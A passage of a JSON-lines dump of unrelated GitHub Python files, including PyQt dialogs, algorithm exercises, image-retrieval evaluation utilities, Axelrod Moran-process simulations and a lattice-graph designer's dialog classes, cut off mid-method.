self.attackComboBox.setItemText(0, _translate(\"Dialog\", \"Случайная\"))\n self.attackComboBox.setItemText(1, _translate(\"Dialog\", \"Максимальная связность\"))\n self.attackComboBox.setItemText(2, _translate(\"Dialog\", \"Минимальная связность\"))\n self.attackComboBox.setItemText(3, _translate(\"Dialog\", \"Центральность\"))\n self.attackComboBox.setItemText(4, _translate(\"Dialog\", \"Центральность с перерасчётом\"))\n self.attackComboBox.setItemText(5, _translate(\"Dialog\", \"Кластеризация\"))\n self.nodesLabel.setText(_translate(\"Dialog\", \"Cреднее количество узлов у вершин\"))\n self.seedLabel.setText(_translate(\"Dialog\", \"Задать определенное значение?\"))\n self.retryLabel.setText(_translate(\"Dialog\", \"Введите количество повторов\"))\n","repo_name":"Elektro33rus/graphs","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7332708634","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n ss = str(bin(n)).lstrip('0b')\n ss = list(reversed(ss))\n answer = []\n for i in range(len(ss)):\n if ss[i] == '1':\n answer.append(i)\n\n for i in answer:\n print(i, end=' ')\n print()\n","repo_name":"halfTaim/Algorithm","sub_path":"9월/CB/이진수.py","file_name":"이진수.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5794919044","text":"# Time: 2022-08-24 09:29:28\n# title: Sideways Sorting\n# language: Python 3\n\n\nwhile 1:\n r,c = map(int, input().split())\n if r+c == 0:\n break\n a = []\n for i in range(r):\n a.append(input())\n b = []\n for i in range(c):\n s = ''\n for j in range(r):\n s += a[j][i]\n b.append(s)\n b = sorted(b, key=str.casefold)\n\n for i in range(r):\n s = ''\n for j in range(c):\n s += b[j][i]\n print(s)\n print()\n","repo_name":"mukerem/ICPC-Journey","sub_path":"Code site scrapping/kattis/archive/sidewayssorting.py","file_name":"sidewayssorting.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"7544718247","text":"from collections import namedtuple\nfrom os.path import join\n\nimport faiss\nimport numpy as np\nfrom pynvml import *\nfrom scipy import stats\nfrom scipy.io import loadmat\nfrom scipy.optimize import least_squares\nfrom skimage import io\n\n\ndef linear_fit(x, y, w, report_error=False):\n def cost(p, x, y, w):\n k = p[0]\n b = p[1]\n error = y - (k * x + b)\n error *= w\n return error\n\n p_init = np.array([-1, 1])\n ret = least_squares(cost, p_init, args=(x, y, w), verbose=0)\n # print(ret['x'][0], ret['x'][1], )\n y_fitted = ret['x'][0] * x + ret['x'][1]\n error = ret['cost']\n if report_error:\n return y_fitted, error\n else:\n return y_fitted\n\n\ndef reduce_sigma(sigma, std_or_sq, log_or_linear, hmean_or_mean):\n ''' \n input sigma: sigma^2, ([1, D])\n output sigma: sigma, (1)\n '''\n if log_or_linear == 'log':\n print('log')\n sigma = np.log(sigma)\n elif log_or_linear == 'linear':\n pass\n else:\n raise NameError('undefined')\n\n if std_or_sq == 'std':\n sigma = np.sqrt(sigma)\n elif std_or_sq == 'sq':\n pass\n else:\n raise NameError('undefined')\n\n if hmean_or_mean == 'hmean':\n sigma = stats.hmean(sigma, axis=1) # ([numQ,])\n elif hmean_or_mean == 'mean':\n sigma = np.mean(sigma, axis=1) # ([numQ,])\n else:\n raise NameError('undefined')\n\n return sigma\n\n\ndef schedule_device():\n ''' output id of the graphic card with most free memory\n '''\n nvmlInit()\n deviceCount = nvmlDeviceGetCount()\n frees = []\n for i in range(deviceCount):\n handle = nvmlDeviceGetHandleByIndex(i)\n # print(\"GPU\", i, \":\", nvmlDeviceGetName(handle))\n info = nvmlDeviceGetMemoryInfo(handle)\n frees.append(info.free / 1e9)\n nvmlShutdown()\n # print(frees)\n id = frees.index(max(frees))\n # print(id)\n return id\n\ndef light_log(path, args):\n with open(join(path, 'screen.log'), 'a') as f:\n for arg in args:\n f.write(arg)\n f.flush()\n print(arg, end='')\n\n\ndef cal_recall_from_embeddings(gt, qFeat, dbFeat):\n n_values = [1, 5, 10]\n\n # ---------------------------------------------------- sklearn --------------------------------------------------- #\n # knn = NearestNeighbors(n_jobs=-1)\n # knn.fit(dbFeat)\n # dists, predictions = knn.kneighbors(qFeat, len(dbFeat))\n\n # --------------------------------- use faiss to do NN search -------------------------------- #\n faiss_index = faiss.IndexFlatL2(qFeat.shape[1])\n faiss_index.add(dbFeat)\n dists, predictions = faiss_index.search(qFeat, max(n_values)) # the results is sorted\n\n recall_at_n = cal_recall(predictions, gt, n_values)\n return recall_at_n\n\n\ndef cal_recall(ranks, pidx, ks):\n\n recall_at_k = np.zeros(len(ks))\n for qidx in range(ranks.shape[0]):\n for i, k in enumerate(ks):\n if np.sum(np.in1d(ranks[qidx, :k], pidx[qidx])) > 0:\n recall_at_k[i:] += 1\n break\n\n recall_at_k /= ranks.shape[0]\n\n return recall_at_k * 100.0\n\n\ndef cal_apk(pidx, rank, k):\n if len(rank) > k:\n rank = rank[:k]\n\n score = 0.0\n num_hits = 0.0\n\n for i, p in enumerate(rank):\n if p in pidx and p not in rank[:i]:\n num_hits += 1.0\n score += num_hits / (i + 1.0)\n\n return score / min(len(pidx), k) * 100.0\n\n\ndef cal_mapk(ranks, pidxs, k):\n\n return np.mean([cal_apk(a, p, k) for a, p in zip(pidxs, ranks)])\n\n\ndef get_zoomed_bins(sigma, num_of_bins):\n s_min = np.min(sigma)\n s_max = np.max(sigma)\n print(s_min, s_max)\n bins_parent = np.linspace(s_min, s_max, num=num_of_bins)\n k = 0\n while True:\n indices = []\n bins_child = np.linspace(bins_parent[0], bins_parent[-1 - k], num=num_of_bins)\n for index in range(num_of_bins - 1):\n target_q_ind_l = np.where(sigma >= bins_child[index])\n if index != num_of_bins - 2:\n target_q_ind_r = np.where(sigma < bins_child[index + 1])\n else:\n target_q_ind_r = np.where(sigma <= bins_child[index + 1])\n target_q_ind = np.intersect1d(target_q_ind_l[0], target_q_ind_r[0])\n indices.append(target_q_ind)\n # if len(indices[-1]) > int(sigma.shape[0] * 0.0005):\n if len(indices[-1]) > int(sigma.shape[0] * 0.001) or k == num_of_bins - 2:\n break\n else:\n k = k + 1\n # print('{:.3f}'.format(sum([len(x) for x in indices]) / sigma.shape[0]), [len(x) for x in indices])\n # print('k=', k)\n return indices, bins_child, k\n\n\ndef bin_pr(preds, dists, gt, vis=False):\n # dists_m = np.around(dists[:, 0], 2) # (4620,)\n # dists_u = np.array(list(set(dists_m)))\n # dists_u = np.sort(dists_u) # small > large\n\n dists_u = np.linspace(np.min(dists[:, 0]), np.max(dists[:, 0]), num=100)\n\n recalls = []\n precisions = []\n for th in dists_u:\n TPCount = 0\n FPCount = 0\n FNCount = 0\n TNCount = 0\n for index_q in range(dists.shape[0]):\n # Positive\n if dists[index_q, 0] < th:\n # True\n if np.any(np.in1d(preds[index_q, 0], gt[index_q])):\n TPCount += 1\n else:\n FPCount += 1\n else:\n if np.any(np.in1d(preds[index_q, 0], gt[index_q])):\n FNCount += 1\n else:\n TNCount += 1\n assert TPCount + FPCount + FNCount + TNCount == dists.shape[0], 'Count Error!'\n if TPCount + FNCount == 0 or TPCount + FPCount == 0:\n # print('zero')\n continue\n recall = TPCount / (TPCount + FNCount)\n precision = TPCount / (TPCount + FPCount)\n recalls.append(recall)\n precisions.append(precision)\n if vis:\n from matplotlib import pyplot as plt\n plt.style.use('ggplot')\n fig = plt.figure(figsize=(5, 5))\n ax = fig.add_subplot(111)\n ax.plot(recalls, precisions)\n ax.set_title('Precision-Recall')\n ax.set_xlabel('Recall')\n ax.set_ylabel('Precision')\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1])\n plt.savefig('pr.png', dpi=200)\n return recalls, precisions\n\n\n\ndef parse_dbStruct_pitts(path):\n dbStruct = namedtuple('dbStruct', ['whichSet', 'dataset', 'dbImage', 'utmDb', 'qImage', 'utmQ', 'numDb', 'numQ', 'posDistThr', 'posDistSqThr', 'nonTrivPosDistSqThr'])\n\n mat = loadmat(path)\n matStruct = mat['dbStruct'].item()\n\n dataset = 'pitts'\n\n whichSet = matStruct[0].item()\n\n # .mat file is generated by python, I replace the use of cell (in Matlab) with char (in Python)\n dbImage = [f[0].item() for f in matStruct[1]]\n # dbImage = matStruct[1]\n utmDb = matStruct[2].T\n # utmDb = matStruct[2]\n\n # .mat file is generated by python, I replace the use of cell (in Matlab) with char (in Python)\n qImage = [f[0].item() for f in matStruct[3]]\n # qImage = matStruct[3]\n utmQ = matStruct[4].T\n # utmQ = matStruct[4]\n\n numDb = matStruct[5].item()\n numQ = matStruct[6].item()\n\n posDistThr = matStruct[7].item()\n posDistSqThr = matStruct[8].item()\n nonTrivPosDistSqThr = matStruct[9].item()\n\n return dbStruct(whichSet, dataset, dbImage, utmDb, qImage, utmQ, numDb, numQ, posDistThr, posDistSqThr, nonTrivPosDistSqThr)\n\ndef cal_hs(img_path):\n img = io.imread(img_path, as_gray=True).reshape(-1, 1)\n counts, bins = np.histogram((img * 255).astype(np.int16), np.arange(0, 256, 1))\n counts = counts / np.sum(counts)\n cumulative = np.cumsum(counts)\n in_min = np.min((img*255).astype(np.int16))\n in_max = np.max((img*255).astype(np.int16))\n per_75 = np.argwhere(cumulative < 0.75)[-1]\n per_25 = np.argwhere(cumulative < 0.25)[-1]\n hs = (per_75 - per_25)/255\n return hs\n\nif __name__ == '__main__':\n pass\n","repo_name":"ramdrop/stun","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"99"} +{"seq_id":"31477938766","text":"import time\r\nt_import_0 = time.perf_counter() #to measure performance\r\nimport axelrod as axl\r\nfrom axelrod.graph import Graph\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom GraphGenerator import GraphGenerator\r\nt_import_1 = time.perf_counter()\r\nprint(f\"Imports took {t_import_1-t_import_0:0.5f} seconds\")\r\n\r\ndef main():\r\n #randomly chosen list of strategies\r\n players = [axl.Cooperator(), axl.Defector(),\r\n axl.TitForTat(), axl.Grudger(),\r\n axl.Alternator(), axl.AdaptorBrief(),\r\n axl.AdaptorLong(), axl.Random(),\r\n axl.Retaliate(), axl.Punisher()]\r\n #initiate graph for visualisation and automatic edge production\r\n gen_graph = GraphGenerator(players)\r\n '''\r\n Now create the edges for axelrod\r\n GraphGenerator will do this automatically for some graph types\r\n but a properly formatted list may also be supplied\r\n if a specific structure is desired that cannot be\r\n automatically generated.\r\n If the structure may be automatically generated,\r\n please write it in the GraphGenerator class\r\n '''\r\n edges = gen_graph.ring_graph()\r\n axl_graph = Graph(edges) #makes axelrod graph instant, for the actual game\r\n mp = axl.MoranProcess(players, interaction_graph=axl_graph, seed=1)\r\n populations = mp.play()\r\n print(f\"There were {len(mp)} rounds in the simple Moran game\")\r\n print(f\"{mp.winning_strategy_name} won the simple Moran game\")\r\n mp.populations_plot()\r\n gen_graph.visualise_graph(edges)\r\n\r\n #to measure performance, help us determine if we will need any HPC time\r\n t1 = time.perf_counter()\r\n print(f\"Simple Moran program ran in {t1-t_import_1:0.5f} seconds\")\r\n\r\n plt.show() #finally show all plots called\r\nmain()\r\n\r\ndef mutation():\r\n t2 = time.perf_counter()\r\n #randomly chosen list of strategies\r\n players = [axl.Cooperator(), axl.Defector(),\r\n axl.TitForTat(), axl.Grudger(),\r\n axl.Alternator(), axl.AdaptorBrief(),\r\n axl.AdaptorLong(), axl.Random(),\r\n axl.Retaliate(), axl.Punisher()]\r\n #initiate graph for visualisation and automatic edge production\r\n gen_graph = GraphGenerator(players)\r\n '''\r\n Now create the edges for axelrod\r\n GraphGenerator will do this automatically for some graph types\r\n but a properly formatted list may also be supplied\r\n if a specific structure is desired that cannot be\r\n automatically generated.\r\n If the structure may be automatically generated,\r\n please write it in the GraphGenerator class\r\n '''\r\n edges = gen_graph.ring_graph()\r\n axl_graph = Graph(edges) #makes axelrod graph instant, for the actual game\r\n\r\n mp = axl.MoranProcess(\r\n players, interaction_graph=axl_graph, mutation_rate=0.05, seed=10\r\n )\r\n #this loop stops the game running indefinitely\r\n for _ in mp:\r\n if len(mp.population_distribution()) == 1:\r\n break\r\n mp.population_distribution() #run the game\r\n mp.populations_plot()\r\n gen_graph.visualise_graph(edges)\r\n\r\n t3 = time.perf_counter()\r\n print(f\"Mutation program ran in {t3-t2:0.5f} seconds\")\r\n\r\n plt.show()\r\nmutation()\r\n","repo_name":"adam-webster/MPhys","sub_path":"graph_moran.py","file_name":"graph_moran.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36047651657","text":"def print_formatted(number): \r\n n = number\r\n size = len(bin(n)) - 2\r\n for i in range(1, n + 1):\r\n dec = str(i)\r\n octal = oct(i)\r\n hexadecimal = hex(i)\r\n binary = bin(i)\r\n print(dec.rjust(size), octal.lstrip(\"0o\").rjust(size), \r\n (hexadecimal.lstrip(\"0x\").rjust(size)).upper(), binary.lstrip(\"0b\").rjust(size))\r\n\r\n","repo_name":"bseitkazin/hackerrank_and_pytest","sub_path":"String_Formatting.py","file_name":"String_Formatting.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35356098359","text":"import gym\nimport sys\nsys.path.append('C:/Users/xuwei1/Documents/baselines')\n\nfrom baselines import deepq\nimport time\n\ndef test0():\n env = gym.make(\"OptimizeGauss-v0\")\n act = deepq.load(\"model/gauss.pkl\")\n episode = 0\n for i in range(1000):\n obs, done = env.reset(), False\n episode_rew = 0\n while not done:\n obs, rew, done, _ = env.step(act(obs[None])[0])\n episode_rew += rew\n # print(episode_rew)\n\n print(env.gauss(obs))\n\nif __name__ == '__main__':\n test0()","repo_name":"PlusWayne/Optimize_based_on_RL","sub_path":"Optimize_based_on_RL/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73318721605","text":"import sys\nfrom pathlib import Path\nimport copy\n\nsys.path.insert(0, str(Path(__file__).parents[0]))\n[sys.modules.pop(m) for m in copy.copy(sys.modules) if m.startswith(\"target\")]\n\n# for sphinx-build\nif \"sphinx_autodoc_multimethod\" not in sys.modules:\n sys.path.insert(0, str(Path(__file__).parents[3]))\n\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx_autodoc_multimethod\",\n]\n\nnitpicky = True\n\nautodoc_typehints = \"both\"\nautodoc_typehints_description_target = \"all\"\nautodoc_typehints_format = \"short\"\n","repo_name":"lorenzncode/sphinx-autodoc-multimethod","sub_path":"tests/roots/test-multimethod/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32116996684","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 28 23:13:29 2017\n\n@author: Ivan Luchko (luchko.ivan@gmail.com)\n\nThis module contains the definition of impotant dialogs and widgets used in app:\n \n class QNotImplemented(QMessageBox):\n class DialogExportLG(QDilaog, Ui_DialogExportLG):\n class DialogSelectLG(QDilaog, Ui_DialogSelectLG):\n class DialogChangeEdgeType(QDilaog, Ui_DialogChangeEdgeType):\n class DialogEditXML(QDialog, Ui_DialogEditXML):\n\n class QSitesListItemWidget(QWidget, Ui_mySiteListItem):\n class DialogSelectSites(QDialog, Ui_selectSites):\n class DialogImportCryst(QDilaog, Ui_DialogImportCryst):\n \n class QColorListItemWidget(QWidget, Ui_myColorListItem):\n class QGraphElemPreference(QCustomListWidget_Add):\n class MyWidgetPreferences(WidgetPreferences, Ui_WidgetPreferences):\n class MyDialogPreferences(DialogPreferences): \n\n class QDistListItemWidget(QWidget, Ui_myDistListItem):\n class MyDistToolBox(QCustomListWidget_Add):\n class DialogDistSearch(QDialog, MyDistToolBox):\n\ntesting and examples:\n \n class TestMainWindow(QObject):\n def test_QGraphElemPreference():\n def test_MyWidgetPreferences():\n def run_test():\n\nModule is compatible with both pyQt4 and pyQt5\n \n\"\"\"\n\nfrom __future__ import division # make python 2 use float division\n\n# define pyQt version\ntry:\n import PyQt4 as PyQt\n pyQtVersion = \"PyQt4\"\n\nexcept ImportError:\n try:\n import PyQt5 as PyQt\n pyQtVersion = \"PyQt5\"\n except ImportError:\n raise ImportError(\"neither PyQt4 or PyQt5 is found\")\n\n# imports requied PyQt modules \nif pyQtVersion == \"PyQt4\":\n from PyQt4.uic import loadUiType\n from PyQt4.QtCore import Qt, pyqtSignal\n from PyQt4.QtGui import (QMessageBox, QFontDialog, QFileDialog, QPushButton, \n QDialogButtonBox, QListWidgetItem, QLabel, QSlider,\n QHBoxLayout, QSizePolicy, QTextCursor, QTextFormat, \n QColor, QFont, QShortcut, QKeySequence)\nelse:\n from PyQt5.uic import loadUiType\n from PyQt5.QtCore import Qt, pyqtSignal\n from PyQt5.QtGui import (QColor, QFont, QTextCursor, QTextFormat, QKeySequence) \n from PyQt5.QtWidgets import (QMessageBox, QFontDialog, QFileDialog, QPushButton, \n QDialogButtonBox, QListWidgetItem, QLabel, \n QSlider, QHBoxLayout, QSizePolicy, QShortcut) \ndef getPathString(output):\n '''\n returns a path string of the QFileDialog output\n \n pyQt5 returns a tuple (path, filter) not just a path QString like pyQt4\n \n '''\n return str(output if pyQtVersion == \"PyQt4\" else output[0])\n\n# import python libs\nimport os\nimport numpy as np\nimport xml.etree.ElementTree as ET\n\n# import project modules\nfrom latticegraph_designer.app.mpl_pane import GraphEdgesEditor \nfrom latticegraph_designer.app.core import (ParseXML, ExportXML, UnitCell, \n Lattice, CrystalCluster)\nfrom latticegraph_designer.widgets import (QColorButton, XMLHighlighter, \n QCodeEditor, QCustomListWidget, \n QCustomListWidget_Add, DealXML,\n DialogPreferences, WidgetPreferences)\n\n# import UI layout created in designer\nui_folder = os.path.dirname(__file__)+'/../resources/ui_layout/'\n#ui_folder = 'latticegraph_designer/resources/ui_layout/'\nUi_DialogExportLG, QDilaog = loadUiType(ui_folder+'dialog_exportLG.ui')\nUi_DialogSelectLG, QDilaog = loadUiType(ui_folder+'dialog_select_LATTICEGRAPH.ui')\nUi_DialogChangeEdgeType, QDilaog = loadUiType(ui_folder+'dialog_changeEdgeType.ui')\nUi_DialogEditXML, QDialog = loadUiType(ui_folder+'dialog_EditXML.ui')\nUi_mySiteListItem, QDilaog = loadUiType(ui_folder+'widget_mySiteListItem.ui')\nUi_selectSites, QDilaog = loadUiType(ui_folder+'dialog_selectSites.ui')\nUi_DialogImportCryst, QDilaog = loadUiType(ui_folder+'dialog_importCryslat.ui')\nUi_myColorListItem, QWidget = loadUiType(ui_folder+'widget_myColorListItem.ui')\nUi_WidgetPreferences, QWidget = loadUiType(ui_folder+'widget_myPreferences.ui')\nUi_myDistListItem, QWidget = loadUiType(ui_folder+'widget_myDistListItem.ui')\n\n# classes definition\n\nclass QNotImplemented(QMessageBox):\n '''called when some functionality is not implemented yet'''\n \n def __init__(self): \n super(QNotImplemented,self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setIcon(QMessageBox.Information)\n self.setText(\"Not implemented yet\")\n self.setWindowTitle(\"Message\")\n self.setStandardButtons(QMessageBox.Ok)\n self.exec_() \n\n\nclass DialogExportLG(QDilaog, Ui_DialogExportLG):\n '''exporting Lattice Graph providing Boundary and Lattice Graph name'''\n def __init__(self, parent, LG_name, boundary):\n super(DialogExportLG, self).__init__()\n self.setupUi(self)\n \n boundaty_list = [\"periodic\",\"open\"]\n self.lineEdit_LGname.setText(LG_name)\n self.comboBox_boundary.addItems(boundaty_list)\n currentIndex = boundaty_list.index(boundary)\n self.comboBox_boundary.setCurrentIndex(currentIndex)\n self.btnPreviewXML.clicked.connect(parent.editXML_callback)\n \n\nclass DialogSelectLG(QDilaog, Ui_DialogSelectLG):\n '''selecting lattice graph from list in xml library'''\n def __init__(self, parent, names):\n super(DialogSelectLG, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n self.parent = parent\n self.list_LG_names.currentItemChanged.connect(self.importXML)\n \n defaultItem = QListWidgetItem(names[0])\n self.list_LG_names.addItem(defaultItem)\n self.list_LG_names.setCurrentItem(defaultItem)\n\n if len(names) > 1:\n for name in names[1:]:\n self.list_LG_names.addItem(str(name))\n \n def importXML(self, selectedItem):\n \n self.parent.importXml(str(selectedItem.text()))\n self.parent.fileNameXML = None\n\n\nclass DialogChangeEdgeType(QDilaog, Ui_DialogChangeEdgeType):\n '''Change type of the selected edge'''\n def __init__(self, parent):\n super(DialogChangeEdgeType, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n self.parent = parent\n edge = parent.UC.edges[parent.gee.e_active_ind]\n _type = edge.type\n num = len(parent.gee.e_activeDist_ids) \n if num == 0:\n label = \"Selected edge: {}\".format(edge)\n else:\n label = \"Selected {0} edges with length: {1}\".format(num, edge.length)\n \n self.label_selected.setText(label)\n self.spinBox_current.setValue(_type)\n self.spinBox_new.setValue(_type)\n \n self.btnOk.clicked.connect(self.ok_callback)\n self.btnCancel.clicked.connect(self.reject)\n \n def ok_callback(self):\n self.parent.gee.change_active_edge_type(self.spinBox_new.value())\n self.accept()\n\n\nclass DialogEditXML(QDialog, Ui_DialogEditXML):\n '''Dialog for interacting with xml library code'''\n \n def __init__(self, parent):\n super(DialogEditXML, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n # \"overload\" codeEditor \n self.vbox.removeWidget(self.codeEditor)\n self.codeEditor.setParent(None)\n self.codeEditor.deleteLater()\n \n self.codeEditor = QCodeEditor(DISPLAY_LINE_NUMBERS = True, \n HIGHLIGHT_CURRENT_LINE = False,\n SyntaxHighlighter = XMLHighlighter) \n self.vbox.insertWidget(1,self.codeEditor)\n \n self.parent = parent\n self.fileNameXML = parent.fileNameXML\n self.labelName.setText(\"XML library file: \"+self.parent.getFileLabelText())\n\n self.setup_edgeHighlighter()\n self.setXML_fromGEE() # import xml code\n # highlight active edge\n self.selectedEdgeChanged_slot(self.parent.gee.e_active_ind)\n\n self.parent.unitCellChanged.connect(self.setXML_fromGEE)\n self.buttonBox.button(QDialogButtonBox.Apply).clicked.connect(self.apply_callback) \n self.btnFont.clicked.connect(self.changeFont_callback)\n \n def setXML_fromGEE(self):\n '''add to aditor xml code of the model defined in GraphEdgesEditor''' \n #remember scrollBar position\n scrollValue = self.codeEditor.verticalScrollBar().value() \n exporter = ExportXML(self.parent.gee.cluster.lattice,\n self.parent.gee.cluster.UC,\n self.parent.LATTICEGRAPH_name,\n NEW_ID = False)\n self.codeEditor.setPlainText(exporter.get_xml_string())\n \n # restore scrollBar position\n self.codeEditor.verticalScrollBar().setValue(scrollValue)\n\n def setup_edgeHighlighter(self):\n '''setup active edge code block highligter format'''\n \n self.cursor = QTextCursor(self.codeEditor.document())\n self.noFormat = self.cursor.blockFormat()\n self.activeEdgeFormat = self.cursor.blockFormat()\n self.activeEdgeFormat.setBackground(QColor(\"#e2e2e2\"))\n self.activeEdgeFormat.setProperty(QTextFormat.FullWidthSelection,True)\n\n self.parent.selectedEdgeChanged.connect(self.selectedEdgeChanged_slot)\n self.parent.selectedEdgeChangedList.connect(self.selectedEdgeChanged_slot)\n\n def selectedEdgeChanged_slot(self, _id):\n '''highlight the block of code coresponding to the selected edge '''\n \n # dlete previous highlighting \n self.cursor.setBlockFormat(self.noFormat)\n # set new highlighting\n if _id is not None:\n # search for block of code\n strBegin = '', self.begin)\n # select block and change format\n self.cursor.setPosition(self.begin, QTextCursor.KeepAnchor)\n self.cursor.setBlockFormat(self.activeEdgeFormat)\n \n # set proper position of scrollBar\n N = 3; d = 4\n for i in range(d+N):\n self.cursor_begin.movePosition(QTextCursor.Down)\n self.codeEditor.setTextCursor(self.cursor_begin)\n for i in range(d+2*N):\n self.cursor_begin.movePosition(QTextCursor.Up)\n self.codeEditor.setTextCursor(self.cursor_begin)\n for i in range(d):\n self.cursor_begin.movePosition(QTextCursor.Down)\n self.codeEditor.setTextCursor(self.cursor_begin)\n \n def changeFont_callback(self):\n '''change font of the codeEditor'''\n currentFont = self.codeEditor.currentCharFormat().font()\n currentFont.setStyle(QFont.StyleNormal)\n font, valid = QFontDialog.getFont(currentFont)\n if valid:\n self.codeEditor.setFont(font)\n \n def apply_callback(self):\n '''apply changes add update GraphEdgesEditor'''\n \n text = str(self.codeEditor.toPlainText())\n self.parent.parser = ParseXML(string = text) \n LG_name = self.parent.parser.get_LATTICEGRAPH_names()[0]\n self.parent.importXml(LG_name) \n #edges ids are changes (ordered) after importing importing \n self.setXML_fromGEE() \n\n\n# classes for importting structure proving crystal parameters\n\n\nclass QSitesListItemWidget(QWidget, Ui_mySiteListItem):\n '''widget for setting listWidget parameters: bool, label, label1, x, y, z'''\n\n def __init__ (self, parent=None):\n super(QSitesListItemWidget, self).__init__(parent)\n self.setupUi(self)\n \n def set_data(self, data, strFlag=False):\n \n if data.get(\"bool\") is not None: self.checkBox.setChecked(data[\"bool\"])\n if data.get(\"label\") is not None: self.label.setText(str(data[\"label\"]))\n if data.get(\"type\") is not None: self.label_type.setText(str(data[\"type\"])) \n if data.get(\"x\") is not None: self.lineEdit_x.setText(str(data[\"x\"]))\n if data.get(\"y\") is not None: self.lineEdit_y.setText(str(data[\"y\"]))\n if data.get(\"z\") is not None: self.lineEdit_z.setText(str(data[\"z\"])) \n \n def get_data(self): \n\n data = {\"bool\":self.checkBox.isChecked(),\n \"label\":str(self.label.text()),\n \"type\":str(self.label_type.text()),\n \"x\":str(self.lineEdit_x.text()),\n \"y\":str(self.lineEdit_y.text()),\n \"z\":str(self.lineEdit_z.text())} \n \n return data \n\n\nclass DialogSelectSites(QDialog, Ui_selectSites):\n '''dialog for selecting sites during parsing a cif file''' \n \n def __init__ (self, data):\n\n super(DialogSelectSites, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n # \"overload\" prefWidget \n self.vbox.removeWidget(self.listWidget)\n self.listWidget.setParent(None)\n self.listWidget.deleteLater() \n self.listWidget = QCustomListWidget(QCustomWidget = QSitesListItemWidget,\n initializationData = data)\n self.vbox.insertWidget(1, self.listWidget)\n \n self.checkBox_all.toggled.connect(self.select_all)\n self.btnCancel.clicked.connect(self.reject)\n self.btnOk.clicked.connect(self.ok_callback)\n \n def select_all(self, _bool):\n '''select/unselect all items'''\n \n data = self.listWidget.get_data()\n for line in data:\n line[\"bool\"] = _bool \n self.listWidget.set_data(data)\n \n def ok_callback(self):\n '''when button Ok is pressed'''\n \n data = self.listWidget.get_data()\n # create sites text\n atomsTextLine = [\" \".join([d[\"x\"],d[\"y\"],d[\"z\"]]) for d in data if d[\"bool\"]] \n self.atomsText = '\\n'.join(atomsTextLine)\n self.accept()\n\n\nclass DialogImportCryst(QDilaog, Ui_DialogImportCryst):\n '''Importing Crystal providing lattice and unit cell parameters'''\n \n def __init__(self, parent):\n super(DialogImportCryst, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setupUi(self)\n \n self.parent = parent\n self.UC = self.parent.UC\n self.lattice = self.parent.lattice\n \n self.btnClose.clicked.connect(self.reject)\n self.btnImport.clicked.connect(self.importCrystal_callback)\n self.btnCIF.clicked.connect(self.process_cif_callback)\n \n self.initialize_forms()\n \n def initialize_forms(self):\n \n self.lineEdit_a.setText(str(round(self.lattice.a, 3)))\n self.lineEdit_b.setText(str(round(self.lattice.b, 3)))\n self.lineEdit_c.setText(str(round(self.lattice.c, 3)))\n\n self.lineEdit_alpha.setText(str(round(np.rad2deg(self.lattice.alpha),3))) \n self.lineEdit_beta.setText(str(round(np.rad2deg(self.lattice.beta),3))) \n self.lineEdit_gamma.setText(str(round(np.rad2deg(self.lattice.gamma),3))) \n\n self.textEdit_symops.setText('x, y, z')\n atomsText = ''\n for key, vertex in self.UC.vertices.items():\n coords = ' '.join([str(round(num,5)) for num in vertex.coords]) \n atomsText = atomsText + coords + '\\n'\n \n self.textEdit_atoms.setText(atomsText)\n \n def importCrystal_callback(self):\n '''\n compute the coordinates of a unit cell sites according to the \n space group symmetry operations and import the crystal.\n \n '''\n msg = \" Computig the vertices coordinates applying symetry operations\" \n self.parent.statusBar().showMessage(msg)\n if self.parent.TEXT_MODE:\n print(msg)\n \n # parse lattice parameters\n cryst_params = []\n lEs = [self.lineEdit_a, self.lineEdit_b, self.lineEdit_c,\n self.lineEdit_alpha,self.lineEdit_beta,self.lineEdit_gamma]\n for lineEdit in lEs:\n cryst_params.append(float(lineEdit.text())) \n abc = cryst_params[:3]\n angles = cryst_params[3:]\n\n # parse atoms coordinates \n atomsText = str(self.textEdit_atoms.toPlainText())\n atomsText = ''.join(e for e in atomsText if e not in \",\") # strip comma\n lines = atomsText.splitlines()\n sites = [[float(num) for num in line.split(' ')] for line in lines if line != '']\n\n # parse symmetry operations\n symopsText = str(self.textEdit_symops.toPlainText())\n symopsText = ''.join(e for e in symopsText if e not in \" '\") #strip space and '\n symops_list = [line.split(',') for line in symopsText.splitlines() if line != '']\n \n # check if parsed corectly\n for symop in symops_list:\n if len(symop) != 3:\n raise ValueError(\"Symmetry operations are not defined according to 'x, y, z' pattern with comma used as separator\")\n \n # create UC and lattice \n self.parent.lattice = Lattice(cell_lengths = abc, angles = angles)\n self.parent.UC = UnitCell(self.parent.lattice)\n 